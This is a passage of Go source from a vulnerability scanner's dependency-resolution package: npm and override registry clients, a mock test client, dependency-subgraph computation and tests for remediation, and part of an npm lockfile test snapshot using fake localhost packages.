} deps = append(deps, resolve.RequirementVersion{ Type: typ, VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Requirement, Version: req, }, }) } } addDeps(dependencies.Dependencies, dep.NewType()) addDeps(dependencies.DevDependencies, dep.NewType(dep.Dev)) addDeps(dependencies.OptionalDependencies, dep.NewType(dep.Opt)) peerType := dep.NewType() peerType.AddAttr(dep.Scope, "peer") addDeps(dependencies.PeerDependencies, peerType) // The resolver expects bundleDependencies to be present as regular // dependencies with a "*" version specifier, even if they were already // in the regular dependencies. bundleType := dep.NewType() bundleType.AddAttr(dep.Scope, "bundle") for _, name := range dependencies.BundleDependencies { deps = append(deps, resolve.RequirementVersion{ Type: bundleType, VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Requirement, Version: "*", }, }) } // Correctly resolving the bundled dependencies would require downloading the package. // Instead, call the fallback deps.dev client to get the bundled dependencies with mangled names. if len(dependencies.BundleDependencies) > 0 { fallbackReqs, err := c.fallback.Requirements(ctx, vk) if err != nil { // TODO: make some placeholder if the package doesn't exist on deps.dev return nil, err } for _, req := range fallbackReqs { if isNpmBundle(req.PackageKey) { deps = append(deps, req) } } } resolve.SortDependencies(deps) return deps, nil } func (c *NpmRegistryClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) { if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.MatchingVersions(ctx, vk) } versions, err := c.api.Versions(ctx, vk.Name) if err != nil { return nil, err } if concVer, ok := versions.Tags[vk.Version]; ok { // matched a tag, return just the concrete version of the tag return []resolve.Version{{ VersionKey: resolve.VersionKey{ PackageKey: vk.PackageKey, Version: concVer, VersionType: resolve.Concrete, }, }}, nil } resVersions := make([]resolve.Version, len(versions.Versions)) for i, v := range versions.Versions { resVersions[i] = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: vk.PackageKey, Version: v, VersionType: resolve.Concrete, }, } } return resolve.MatchRequirement(vk, resVersions), nil } func isNpmBundle(pk resolve.PackageKey) bool { // Bundles are represented in resolution with a 'mangled' name containing its origin e.g. "root-pkg>1.0.0>bundled-package" // '>' is not a valid character for a npm package, so it'll only be found here. return strings.Contains(pk.Name, ">") } func (c *NpmRegistryClient) AddRegistries(_ []Registry) error { return nil } func (c *NpmRegistryClient) WriteCache(path string) error { f, err := os.Create(path + npmRegistryCacheExt) if err != nil { return err } defer f.Close() return gob.NewEncoder(f).Encode(c.api) } func (c *NpmRegistryClient) LoadCache(path string) error { f, err := os.Open(path + npmRegistryCacheExt) if err != nil { return err } defer f.Close() return gob.NewDecoder(f).Decode(&c.api) } ================================================ FILE: internal/resolution/client/override_client.go ================================================ package client import ( "context" "slices" "deps.dev/util/resolve" ) // OverrideClient wraps a DependencyClient, allowing for custom packages & versions to be added type OverrideClient struct { DependencyClient // Can't quite reuse resolve.LocalClient because it automatically creates dependencies pkgVers map[resolve.PackageKey][]resolve.Version // versions of a package verDeps map[resolve.VersionKey][]resolve.RequirementVersion // dependencies of a version } func NewOverrideClient(c DependencyClient) *OverrideClient { return &OverrideClient{ DependencyClient: c, pkgVers: make(map[resolve.PackageKey][]resolve.Version), verDeps: make(map[resolve.VersionKey][]resolve.RequirementVersion), } } func (c *OverrideClient) AddVersion(v resolve.Version, deps []resolve.RequirementVersion) { // TODO: Inserting multiple co-dependent requirements may not work, depending on order versions := c.pkgVers[v.PackageKey] sem := v.Semver() // Only add it to the versions if not already there (and keep versions sorted) idx, ok := slices.BinarySearchFunc(versions, v, func(a, b resolve.Version) int { return sem.Compare(a.Version, b.Version) }) if !ok { versions = slices.Insert(versions, idx, v) } c.pkgVers[v.PackageKey] = versions c.verDeps[v.VersionKey] = slices.Clone(deps) // overwrites dependencies if called multiple times with same version } func (c *OverrideClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) { for _, v := range c.pkgVers[vk.PackageKey] { if v.VersionKey == vk { return v, nil } } return c.DependencyClient.Version(ctx, vk) } func (c *OverrideClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) { if vers, ok := c.pkgVers[pk]; ok { return vers, nil } return c.DependencyClient.Versions(ctx, pk) } func (c *OverrideClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) { if deps, ok := c.verDeps[vk]; ok { return deps, nil } return c.DependencyClient.Requirements(ctx, vk) } func (c *OverrideClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) { if vs, ok := c.pkgVers[vk.PackageKey]; ok { return resolve.MatchRequirement(vk, vs), nil } return c.DependencyClient.MatchingVersions(ctx, vk) } ================================================ FILE: internal/resolution/clienttest/mock_resolution_client.go ================================================ // Package clienttest provides a mock resolution client for testing. package clienttest import ( "context" "encoding/json" "os" "strings" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/schema" "github.com/goccy/go-yaml" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) type ResolutionUniverse struct { System string `yaml:"system"` Schema string `yaml:"schema"` } type VulnerabilityMatcher struct { Vulns []*osvschema.Vulnerability `json:"vulns"` } // UnmarshalJSON unmarshals the mock vulns. The Vulnerability field is a proto // message, so it needs to be unmarshaled with protojson. func (vm *VulnerabilityMatcher) UnmarshalJSON(data []byte) error { var raw map[string][]json.RawMessage if err := json.Unmarshal(data, &raw); err != nil { return err } for _, v := range raw["vulns"] { if string(v) == "null" { vm.Vulns = append(vm.Vulns, nil) continue } vuln := &osvschema.Vulnerability{} if err := protojson.Unmarshal(v, vuln); err != nil { return err } vm.Vulns = append(vm.Vulns, vuln) } return nil } func (vm *VulnerabilityMatcher) MatchVulnerabilities(_ context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) { result := make([][]*osvschema.Vulnerability, len(pkgs)) for i, pkg := range pkgs { result[i] = localmatcher.VulnerabilitiesAffectingPackage(vm.Vulns, pkg) } return result, nil } type mockDependencyClient struct { *resolve.LocalClient } func (mdc mockDependencyClient) LoadCache(string) error { return nil } func (mdc mockDependencyClient) WriteCache(string) error { return nil } func (mdc mockDependencyClient) AddRegistries(_ []client.Registry) error { return nil } func NewMockResolutionClient(t *testing.T, universeYaml, vulnJSON string) client.ResolutionClient { t.Helper() f, err := os.Open(vulnJSON) if err != nil { t.Fatalf("failed reading mock vulnerability file: %v", err) } var vm VulnerabilityMatcher if err := json.NewDecoder(f).Decode(&vm); err != nil { t.Fatalf("failed decoding mock vulns: %v", err) } cl := client.ResolutionClient{ VulnerabilityMatcher: &vm, } f, err = os.Open(universeYaml) if err != nil { t.Fatalf("failed opening mock universe: %v", err) } defer f.Close() dec := yaml.NewDecoder(f) var universe ResolutionUniverse if err := dec.Decode(&universe); err != nil { t.Fatalf("failed decoding mock universe: %v", err) } var sys resolve.System switch strings.ToLower(universe.System) { case "npm": sys = resolve.NPM case "maven": sys = resolve.Maven default: t.Fatalf("unknown ecosystem in universe: %s", universe.System) } // schema needs a strict tab indentation, which is awkward to do within the YAML. // Replace double space from yaml with single tab universe.Schema = strings.ReplaceAll(universe.Schema, " ", "\t") sch, err := schema.New(universe.Schema, sys) if err != nil { t.Fatalf("failed parsing schema: %v", err) } cl.DependencyClient = mockDependencyClient{sch.NewClient()} return cl } ================================================ FILE: internal/resolution/dependency_subgraph.go ================================================ package resolution import ( "context" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type GraphNode struct { Version resolve.VersionKey Distance int // The shortest distance to the end Dependency Node (which has a Distance of 0) Parents []resolve.Edge // Parent edges i.e. with Edge.To == this ID Children []resolve.Edge // Child edges i.e. with Edge.From == this ID } type DependencySubgraph struct { Dependency resolve.NodeID // The NodeID of the end dependency of this subgraph. Nodes map[resolve.NodeID]GraphNode } // ComputeSubgraphs computes the DependencySubgraphs for each specified NodeID. // The computed Subgraphs contains all nodes and edges that transitively depend on the specified node, and the node itself. // // Modifying any of the returned DependencySubgraphs may cause unexpected behaviour. func ComputeSubgraphs(g *resolve.Graph, nodes []resolve.NodeID) []*DependencySubgraph { // Find the parent nodes of each node in graph, for easier traversal. // These slices are shared between the returned subgraphs. parentEdges := make(map[resolve.NodeID][]resolve.Edge) for _, e := range g.Edges { // Check for a self-dependency, just in case. if e.From == e.To { continue } parentEdges[e.To] = append(parentEdges[e.To], e) } // For each node, compute the subgraph. subGraphs := make([]*DependencySubgraph, 0, len(nodes)) for _, nodeID := range nodes { // Starting at the node of interest, visit all unvisited parents, // adding the corresponding edges to the GraphNodes. gNodes := make(map[resolve.NodeID]GraphNode) seen := make(map[resolve.NodeID]struct{}) seen[nodeID] = struct{}{} toProcess := []resolve.NodeID{nodeID} currDistance := 0 // The current distance from end dependency. for len(toProcess) > 0 { // Track the next set of nodes to process, which will be +1 Distance away from end. var next []resolve.NodeID for _, node := range toProcess { // Construct the GraphNode parents := parentEdges[node] gNode := gNodes[node] // Grab the existing GraphNode, which will have some Children populated. gNode.Version = g.Nodes[node].Version gNode.Distance = currDistance gNode.Parents = parents gNodes[node] = gNode // Populate parent's children and add to next set. for _, edge := range parents { nID := edge.From pNode := gNodes[nID] pNode.Children = append(pNode.Children, edge) gNodes[nID] = pNode if _, ok := seen[nID]; !ok { seen[nID] = struct{}{} next = append(next, nID) } } } toProcess = next currDistance++ } subGraphs = append(subGraphs, &DependencySubgraph{ Dependency: nodeID, Nodes: gNodes, }) } return subGraphs } // IsDevOnly checks if this DependencySubgraph solely contains dev (or test) dependencies. // If groups is nil, checks the dep.Type of the direct graph edges for the Dev Attr (for in-place). // Otherwise, uses the groups of the direct dependencies to determine if a non-dev path exists (for relax/override). func (ds *DependencySubgraph) IsDevOnly(groups map[manifest.RequirementKey][]string) bool { if groups != nil { // Check if any of the direct dependencies are not in the dev group. return !slices.ContainsFunc(ds.Nodes[0].Children, func(e resolve.Edge) bool { req := resolve.RequirementVersion{ VersionKey: ds.Nodes[e.To].Version, Type: e.Type.Clone(), } reqGroups := groups[manifest.MakeRequirementKey(req)] switch req.System { case resolve.NPM: return !slices.Contains(reqGroups, "dev") case resolve.Maven: return !slices.Contains(reqGroups, "test") case resolve.UnknownSystem: fallthrough default: return true } }) } // groups == nil // Check if any of the direct dependencies do not have the Dev attr. for _, e := range ds.Nodes[0].Children { if e.Type.HasAttr(dep.Dev) { continue } // As a workaround for npm workspaces, check for the Dev attr in the direct dependency's dependencies. for _, e2 := range ds.Nodes[e.To].Children { if !e2.Type.HasAttr(dep.Dev) { return false } } // If the vulnerable dependency is a direct dependency, it'd have no Children. // Since we've already checked that it doesn't have the Dev attr, it must be a non-dev dependency. if e.To == ds.Dependency { return false } } return true } // ConstrainingSubgraph tries to construct a subgraph of the subgraph that includes only the edges that contribute to a vulnerability. // It identifies the dependencies which constrain the vulnerable package to use a vulnerable version. // This is used by the 'relax' remediation strategy to identify which direct dependencies need to be updated. // // e.g. for a subgraph with: // // A -> C@<2.0 // B -> C@<3.0 // C resolves to C@1.9 // // If the vuln affecting C is fixed in version 2.0, the constraining subgraph would only contain A, // since B would allow versions >=2.0 of C to be selected if not for A. // // This is a heuristic approach and may produce false positives (meaning possibly unnecessary dependencies would be flagged to be relaxed). // If the constraining subgraph cannot be computed for some reason, returns the original DependencySubgraph. func (ds *DependencySubgraph) ConstrainingSubgraph(ctx context.Context, cl resolve.Client, vuln *osvschema.Vulnerability) *DependencySubgraph { // Just check if the direct requirement of the vulnerable package is constraining it. // This still has some false positives. // e.g. if we have // A@* -> B@2.* // D@* -> B@2.1.1 -> C@1.0.0 // resolving both together picks B@2.1.1 & thus constrains C to C@1.0.0 for A // But resolving A alone could pick B@2.2.0 which might not depend on C // Similarly, a direct dependency could be constrained by an indirect dependency with similar results. end := ds.Nodes[ds.Dependency] newParents := make([]resolve.Edge, 0, len(end.Parents)) for _, pEdge := range end.Parents { // Check if the latest allowable version of the package is vulnerable vk := end.Version vk.Version = pEdge.Requirement vk.VersionType = resolve.Requirement vers, err := cl.MatchingVersions(ctx, vk) if err != nil || len(vers) == 0 { // Could not determine MatchingVersions - assume this is constraining. newParents = append(newParents, pEdge) continue } bestVK := vers[len(vers)-1] // This should be the highest version for npm if vulns.IsAffected(vuln, util.VKToPackageInfo(bestVK.VersionKey)) { newParents = append(newParents, pEdge) } } if len(newParents) == 0 { // There has to be at least one constraining path for the vulnerability to appear. // If our heuristic couldn't determine any, treat the whole subgraph as constraining. return ds } // Rebuild the DependencySubgraph using the dependency's newParents. // Same logic as in ComputeSubgraphs. newNodes := make(map[resolve.NodeID]GraphNode) newNodes[ds.Dependency] = GraphNode{ Version: end.Version, Distance: 0, Parents: newParents, } seen := make(map[resolve.NodeID]struct{}) seen[ds.Dependency] = struct{}{} toProcess := make([]resolve.NodeID, 0, len(newParents)) for _, e := range newParents { toProcess = append(toProcess, e.From) seen[e.From] = struct{}{} } currDistance := 1 for len(toProcess) > 0 { var next []resolve.NodeID for _, nID := range toProcess { oldNode := ds.Nodes[nID] newNode := GraphNode{ Version: oldNode.Version, Distance: currDistance, Parents: slices.Clone(oldNode.Parents), Children: slices.Clone(oldNode.Children), } // Remove the non-constraining edge from the node's children if it ends up in the subgraph. newNode.Children = slices.DeleteFunc(newNode.Children, func(e resolve.Edge) bool { if e.To != ds.Dependency { return false } return !slices.ContainsFunc(newParents, func(pEdge resolve.Edge) bool { return pEdge.From == e.From && pEdge.Requirement == e.Requirement && pEdge.Type.Compare(e.Type) == 0 }) }) newNodes[nID] = newNode for _, e := range newNode.Parents { if _, ok := seen[e.From]; !ok { seen[e.From] = struct{}{} next = append(next, e.From) } } } toProcess = next currDistance++ } // Remove children edges to nodes that are not in the computed subgraph. for nID, edge := range newNodes { edge.Children = slices.DeleteFunc(edge.Children, func(e resolve.Edge) bool { _, ok := seen[e.To] return !ok }) newNodes[nID] = edge } return &DependencySubgraph{ Dependency: ds.Dependency, Nodes: newNodes, } } ================================================ FILE: internal/resolution/dependency_subgraph_test.go ================================================ package resolution_test import ( "cmp" "maps" "slices" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/schema" gocmp "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestDependencySubgraph(t *testing.T) { t.Parallel() g, err := schema.ParseResolve(` a 0.0.1 b@^1.0.1 1.0.1 $c@^1.0.0 d: d@^2.2.2 2.2.2 c: c@^1.0.2 1.0.2 e@1.0.0 1.0.0 $d@^2.0.0 f@^1.1.1 1.1.1 $c@^1.0.1 g@^2.2.2 2.2.2 h@^3.3.3 3.3.3 $d@^2.2.0 `, resolve.NPM) if err != nil { t.Fatalf("failed to parse test graph: %v", err) } nodes := make([]resolve.NodeID, len(g.Nodes)-1) for i := range nodes { nodes[i] = resolve.NodeID(i + 1) } subgraphs := resolution.ComputeSubgraphs(g, nodes) for _, sg := range subgraphs { checkSubgraphVersions(t, sg, g) checkSubgraphEdges(t, sg) checkSubgraphNodesReachable(t, sg) checkSubgraphDistances(t, sg) } } func TestConstrainingSubgraph(t *testing.T) { t.Parallel() const vulnPkgName = "vuln" g, err := schema.ParseResolve(` root 1.0.0 vuln: vuln@<3 1.0.1 nonprob1@^1.0.0 1.0.0 $vuln@>1 prob1@^1.0.0 1.0.0 $vuln@^1.0.0 prob2@^2.0.0 2.0.0 nonprob2@* 1.0.0 $vuln@* $vuln@* dep@3.0.0 3.0.0 $vuln@1.0.1 `, resolve.NPM) if err != nil { t.Fatalf("failed to parse test graph: %v", err) } nID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == vulnPkgName }) if nID < 0 { t.Fatalf("failed to find vulnerable node in test graph") } subgraph := resolution.ComputeSubgraphs(g, []resolve.NodeID{resolve.NodeID(nID)})[0] cl := resolve.NewLocalClient() v := resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: vulnPkgName, }, VersionType: resolve.Concrete, }, } v.Version = "1.0.0" cl.AddVersion(v, []resolve.RequirementVersion{}) v.Version = "1.0.1" cl.AddVersion(v, []resolve.RequirementVersion{}) v.Version = "2.0.0" cl.AddVersion(v, []resolve.RequirementVersion{}) vuln := &osvschema.Vulnerability{ Id: "VULN-001", Affected: []*osvschema.Affected{{ Package: &osvschema.Package{ Ecosystem: "npm", Name: vulnPkgName, }, Ranges: []*osvschema.Range{ { Type: osvschema.Range_SEMVER, Events: []*osvschema.Event{{Introduced: "0"}, {Fixed: "2.0.0"}}, }, }, }, }} got := subgraph.ConstrainingSubgraph(t.Context(), cl, vuln) checkSubgraphVersions(t, got, g) checkSubgraphEdges(t, got) checkSubgraphNodesReachable(t, got) checkSubgraphDistances(t, got) // Checking that we have the expected remaining nodes expectedRemoved := []string{"nonprob1", "nonprob2"} for _, pkgName := range expectedRemoved { nID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == pkgName }) if nID < 0 { t.Fatalf("failed to find expected node in test graph") } if _, found := got.Nodes[resolve.NodeID(nID)]; found { t.Errorf("non-constraining node was not removed from constraining subgraph: %s", pkgName) } } if len(got.Nodes) != len(subgraph.Nodes)-len(expectedRemoved) { t.Errorf("extraneous nodes found in constraining subgraph") } for nID := range got.Nodes { if _, ok := subgraph.Nodes[nID]; !ok { t.Errorf("extraneous node (%v) found in constraining subgraph", nID) } } // Check that ConstrainingSubgraph is stable if reapplied again := got.ConstrainingSubgraph(t.Context(), cl, vuln) if diff := gocmp.Diff(got, again); diff != "" { t.Errorf("ConstrainingSubgraph output changed on reapply (-want +got):\n%s", diff) } } func TestSubgraphIsDevOnly(t *testing.T) { t.Parallel() g, err := schema.ParseResolve(` a 1.0.0 b@1.0.0 1.0.0 prod: prod@1.0.0 1.0.0 Dev|c@1.0.0 1.0.0 $prod@1.0.0 dev: dev@1.0.0 1.0.0 Dev|d@1.0.0 1.0.0 $dev@1.0.0 `, resolve.NPM) if err != nil { t.Fatalf("failed to parse test graph: %v", err) } prodID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == "prod" }) if prodID < 0 { t.Fatalf("failed to find vulnerable node in test graph") } devID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == "dev" }) if devID < 0 { t.Fatalf("failed to find vulnerable node in test graph") } subgraphs := resolution.ComputeSubgraphs(g, []resolve.NodeID{resolve.NodeID(prodID), resolve.NodeID(devID)}) prodGraph := subgraphs[0] devGraph := subgraphs[1] if prodGraph.IsDevOnly(nil) { t.Errorf("non-dev subgraph has IsDevOnly(nil) == true") } if !devGraph.IsDevOnly(nil) { t.Errorf("dev-only subgraph has IsDevOnly(nil) == false") } groups := map[manifest.RequirementKey][]string{ {PackageKey: resolve.PackageKey{System: resolve.NPM, Name: "c"}, EcosystemSpecific: ""}: {"dev"}, {PackageKey: resolve.PackageKey{System: resolve.NPM, Name: "d"}, EcosystemSpecific: ""}: {"dev"}, } if prodGraph.IsDevOnly(groups) { t.Errorf("non-dev subgraph has IsDevOnly(groups) == true") } if !devGraph.IsDevOnly(groups) { t.Errorf("dev-only subgraph has IsDevOnly(groups) == false") } } func checkSubgraphVersions(t *testing.T, sg *resolution.DependencySubgraph, g *resolve.Graph) { // Check that the nodes and versions in the subgraph are correct t.Helper() if _, ok := sg.Nodes[0]; !ok { t.Errorf("DependencySubgraph missing root node (0)") } if _, ok := sg.Nodes[sg.Dependency]; !ok { t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency) } for nID, node := range sg.Nodes { if nID < 0 || int(nID) >= len(g.Nodes) { t.Errorf("DependencySubgraph contains invalid node ID: %v", nID) continue } want := g.Nodes[nID].Version got := node.Version if diff := gocmp.Diff(want, got); diff != "" { t.Errorf("DependencySubgraph node %v does not match Graph (-want +got):\n%s", nID, diff) } } } func checkSubgraphEdges(t *testing.T, sg *resolution.DependencySubgraph) { // Check that every edge in a node's Parents appears in that parent's Children and vice versa. t.Helper() // Check the root node has no parents & end node has no children if root, ok := sg.Nodes[0]; !ok { t.Errorf("DependencySubgraph missing root node (0)") } else if len(root.Parents) != 0 { t.Errorf("DependencySubgraph root node (0) has parent nodes: %v", root.Parents) } if end, ok := sg.Nodes[sg.Dependency]; !ok { t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency) } else if len(end.Children) != 0 { t.Errorf("DependencySubgraph Dependency node (%v) has child nodes: %v", sg.Dependency, end.Children) } edgeEq := func(a, b resolve.Edge) bool { return a.From == b.From && a.To == b.To && a.Requirement == b.Requirement && a.Type.Compare(b.Type) == 0 } // Check each node's parents/children for same edges for nID, node := range sg.Nodes { // Only the root node should have no parents if len(node.Parents) == 0 && nID != 0 { t.Errorf("DependencySubgraph node %v has no parent nodes", nID) } for _, e := range node.Parents { if e.To != nID { t.Errorf("DependencySubgraph node %v contains invalid parent edge: %v", nID, e) continue } parent, ok := sg.Nodes[e.From] if !ok { t.Errorf("DependencySubgraph edge missing node in subgraph: %v", e) } if !slices.ContainsFunc(parent.Children, func(edge resolve.Edge) bool { return edgeEq(e, edge) }) { t.Errorf("DependencySubgraph node %v missing child edge: %v", e.From, e) } } // Only the end node should have no children if len(node.Children) == 0 && nID != sg.Dependency { t.Errorf("DependencySubgraph node %v has no child nodes", nID) } for _, e := range node.Children { if e.From != nID { t.Errorf("DependencySubgraph node %v contains invalid child edge: %v", nID, e) continue } child, ok := sg.Nodes[e.To] if !ok { t.Errorf("DependencySubgraph edge missing node in subgraph: %v", e) } if !slices.ContainsFunc(child.Parents, func(edge resolve.Edge) bool { return edgeEq(e, edge) }) { t.Errorf("DependencySubgraph node %v missing parent edge: %v", e.To, e) } } } } func checkSubgraphNodesReachable(t *testing.T, sg *resolution.DependencySubgraph) { // Check that every node in the subgraph is reachable from the root node. t.Helper() seen := make(map[resolve.NodeID]struct{}) todo := make([]resolve.NodeID, 0, len(sg.Nodes)) todo = append(todo, 0) seen[0] = struct{}{} for len(todo) > 0 { nID := todo[0] todo = todo[1:] node, ok := sg.Nodes[nID] if !ok { t.Errorf("DependencySubgraph missing expected node %v", nID) continue } for _, e := range node.Children { if _, ok := seen[e.To]; !ok { todo = append(todo, e.To) seen[e.To] = struct{}{} } } } got := slices.Sorted(maps.Keys(seen)) want := slices.Sorted(maps.Keys(sg.Nodes)) if diff := gocmp.Diff(want, got); diff != "" { t.Errorf("DependencySubgraph reachable nodes mismatch (-want +got):\n%s", diff) } } func checkSubgraphDistances(t *testing.T, sg *resolution.DependencySubgraph) { // Check that the distances of each node have the correct value. t.Helper() if end, ok := sg.Nodes[sg.Dependency]; !ok { t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency) } else if end.Distance != 0 { t.Errorf("DependencySubgraph end Dependency distance is not 0") } // Each node's distance should be one more than its smallest child's distance. for nID, node := range sg.Nodes { // The end dependency should have a distance of 0 if nID == sg.Dependency { if node.Distance != 0 { t.Errorf("DependencySubgraph Dependency node (%v) has nonzero distance: %d", nID, node.Distance) } continue } if len(node.Children) == 0 { t.Errorf("DependencySubgraph node %v has no child nodes", nID) continue } e := slices.MinFunc(node.Children, func(a, b resolve.Edge) int { return cmp.Compare(sg.Nodes[a.To].Distance, sg.Nodes[b.To].Distance) }) want := sg.Nodes[e.To].Distance + 1 if node.Distance != want { t.Errorf("DependencySubgraph node %v Distance = %d, want = %d", nID, node.Distance, want) } } } ================================================ FILE: internal/resolution/depfile/depfile.go ================================================ // Package depfile provides a temporary abstraction for files that have been opened for extraction. // TODO(michaelkedar): This is used for guided remediation, and will be removed after the migration to OSV-Scalibr is complete. package depfile import ( "io" "os" "path/filepath" ) // DepFile is an abstraction for a file that has been opened for extraction, // and that knows how to open other DepFiles relative to itself. type DepFile interface { io.Reader // Open opens an NestedDepFile based on the path of the // current DepFile if the provided path is relative. // // If the path is an absolute path, then it is opened absolutely. Open(path string) (NestedDepFile, error) Path() string } // NestedDepFile is an abstraction for a file that has been opened while extracting another file, // and would need to be closed. type NestedDepFile interface { io.Closer DepFile } // A LocalFile represents a file that exists on the local filesystem. type LocalFile struct { // TODO(rexpan): This should be *os.File, as that would allow us to access other underlying functions that definitely will exist io.ReadCloser path string } func (f LocalFile) Open(path string) (NestedDepFile, error) { if filepath.IsAbs(path) { return OpenLocalDepFile(path) } return OpenLocalDepFile(filepath.Join(filepath.Dir(f.path), path)) } func (f LocalFile) Path() string { return f.path } func OpenLocalDepFile(path string) (NestedDepFile, error) { r, err := os.Open(path) if err != nil { return LocalFile{}, err } // Very unlikely to have Abs return an error if the file opens correctly path, _ = filepath.Abs(path) return LocalFile{r, path}, nil } ================================================ FILE: internal/resolution/lockfile/__snapshots__/npm_test.snap ================================================ [TestNpmWrite - 1] { "name": "r", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "r", "version": "1.0.0", "license": "ISC", "workspaces": [ "W" ], "dependencies": { "@fake-registry/a": "^1.2.3", "@fake-registry/b": "^1.0.1" }, "devDependencies": { "a-dev": "npm:@fake-registry/a@^2.3.4" } }, "node_modules/@fake-registry/a": { "version": "1.2.4", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz", "integrity": "sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "license": "OriginalLicenseDoNotSteal", "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" } }, "node_modules/@fake-registry/b": { "version": "1.0.1", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-1.0.1.tgz", "integrity": "sha512-uocjkNUbEPBa/oFFYNq+CkWkkr4My+gJQHnB1fFqIrIQtvjbQ/4dtp/6Kmfb5SFJ/bVfAGZ8mmC+c3Bz4JISYQ==", "license": "ISC" }, "node_modules/@fake-registry/c": { "version": "1.1.1", "resolved": "http://localhost:4873/@fake-registry%2fc/-/c-1.1.1.tgz", "integrity": "sha512-bihWUzvU62dcwPN4TguhntQpC1zpj7H0fHAhffya6tl3BCrEdjqO4oEpNHF/jtU5PPvY0L60mJNUS6MbizEVrA==", "dev": true, "license": "BSD-2-Clause", "peerDependencies": { "@fake-registry/d": "^2.0.0" } }, "node_modules/@fake-registry/d": { "version": "2.2.2", "resolved": "http://localhost:4873/@fake-registry%2fd/-/d-2.2.2.tgz", "integrity": "sha512-YLeJVbfOCJZcUizGgpvPesIVSY9TYmWz2HcF+7mWxSuXuvu13FABprnRSDGEhljBRM+QAaUD+nbUHWenq2vL4w==", "dev": true, "license": "ISC" }, "node_modules/a-dev": { "name": "@fake-registry/a", "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" } }, "node_modules/a-dev/node_modules/@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "license": "ISC", "dependencies": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } }, "node_modules/w": { "resolved": "W", "link": true }, "W": { "name": "w", "version": "1.0.0", "license": "ISC", "devDependencies": { "@fake-registry/a": "^2.3.4" } }, "W/node_modules/@fake-registry/a": { "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" } }, "W/node_modules/@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "license": "ISC", "dependencies": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } } }, "dependencies": { "@fake-registry/a": { "version": "1.2.4", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz", "integrity": "sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "requires": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" } }, "@fake-registry/b": { "version": "1.0.1", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-1.0.1.tgz", "integrity": "sha512-uocjkNUbEPBa/oFFYNq+CkWkkr4My+gJQHnB1fFqIrIQtvjbQ/4dtp/6Kmfb5SFJ/bVfAGZ8mmC+c3Bz4JISYQ==" }, "@fake-registry/c": { "version": "1.1.1", "resolved": "http://localhost:4873/@fake-registry%2fc/-/c-1.1.1.tgz", "integrity": "sha512-bihWUzvU62dcwPN4TguhntQpC1zpj7H0fHAhffya6tl3BCrEdjqO4oEpNHF/jtU5PPvY0L60mJNUS6MbizEVrA==", "dev": true, "requires": {} }, 